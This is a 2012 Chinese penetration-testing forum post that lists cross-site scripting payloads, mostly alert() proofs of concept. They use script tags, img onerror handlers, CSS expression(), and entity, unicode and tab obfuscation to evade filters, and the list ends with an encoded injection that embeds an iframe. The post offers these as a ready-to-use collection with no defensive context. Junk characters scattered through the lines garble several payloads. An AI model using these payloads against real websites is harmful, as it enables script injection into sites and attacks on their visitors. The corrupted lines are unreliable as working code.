中国网络渗透测试联盟

标题: 跨站语句大全 [打印本页]
作者: admin    时间: 2012-9-13 17:15
标题: 跨站语句大全
<script>alert("跨站")</script>    (最常用)
5 o7 ?; ~7 c7 d, L<img scr=javascript:alert("跨站")></img>7 x1 o1 h) B1 b) @) d5 r, e" @
<img scr="javascrip&#116&#58 alert(/跨站/)></img>
  O% j! |, J3 g! g3 _/ j' i<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)& R: n6 i: k) l/ }" L% R
<img scr="#" onerror=alert(/跨站/)></img>0 P- G" a- Y6 {7 @6 i' {  v, I
<img scr="#" style="xss:expression(alert(/xss/));"></img>
& O; C1 v. b  m# c# I7 {1 X& m<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
8 A8 m; o0 O# Z0 C$ J; A4 G<img src=vbscript:msgbox ("xss")></img>9 \  b9 b: g1 g: {' `  F# I
<style> input {left:expression (alert('xss'))}</style>
5 l7 a3 D/ x# L8 ^, X<div style={left:expression (alert('xss'))}></div># d  x" v8 B% I' \' ~
<div style={left:exp/* */ression (alert('xss'))}></div>7 G) ?0 ~1 W& X+ K
<div style={left:\0065\0078ression (alert('xss'))}></div>
  ~9 h! B6 s; ^. S( Q# Vhtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
! u" o" T4 I# eunicode <div style="{left:expRessioN (alert('xss'))}">
9 |; }, j* B# C1 z6 ]" g6 d+ N$ `; T" f0 e; C, e. C
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["9 W; p- @  D; f% h9 E$ |" R( Y




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2